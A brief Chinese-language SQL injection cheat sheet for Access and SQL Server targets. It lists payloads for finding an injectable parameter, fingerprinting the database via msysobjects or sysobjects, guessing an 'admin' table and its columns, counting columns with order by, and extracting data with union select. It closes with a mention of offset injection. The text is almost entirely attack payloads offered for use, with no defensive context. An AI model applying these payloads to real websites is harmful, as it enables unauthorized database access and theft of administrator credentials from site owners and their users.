注入---access

注入点的判断

‘

and 1=1

and 1=2

or 1=1

or 1=2

判断数据库类型

and exists(select * from msysobjects)>0 -----access

and exists(select * from sysobjects) >0------sqlserver

判断数据库表

and exists(select * from admin)

判断字段名

and exists(select admin from admin)

判断字段长度

order by 10

爆出

union select 字段 form 字段名

偏移注入

用于表名出来了但是列名猜不到的地方

运气很重要